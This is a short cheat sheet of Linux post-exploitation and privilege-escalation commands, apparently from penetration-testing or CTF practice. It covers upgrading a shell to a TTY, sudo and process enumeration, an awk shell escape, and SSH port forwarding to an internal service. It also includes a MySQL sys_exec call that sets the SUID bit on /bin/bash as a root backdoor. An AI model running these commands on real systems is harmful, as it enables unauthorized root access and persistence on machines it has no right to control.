/!\ To get a nice TTY :
python -c 'import pty;pty.spawn("/bin/bash")'
CTRL + Z
stty raw -echo
- Checking sudo :
sudo -l - Checking netstat :
netstat -laputen - Checking process :
ps -elf
awk 'BEGIN {system("/bin/sh")}'
Service listen on local on port 1234.
ssh user@remotemachine-L 80:localhost:1234
Now naviguate to localhost:80
Binaries that can be exploited : https://gtfobins.github.io
Execute command : mysql -u [user] -p -e "COMMAND HERE"
Execute command as MySQL process owner : mysql> SELECT sys_exec('chmod u+s /bin/bash');
dir /ahto display hidden files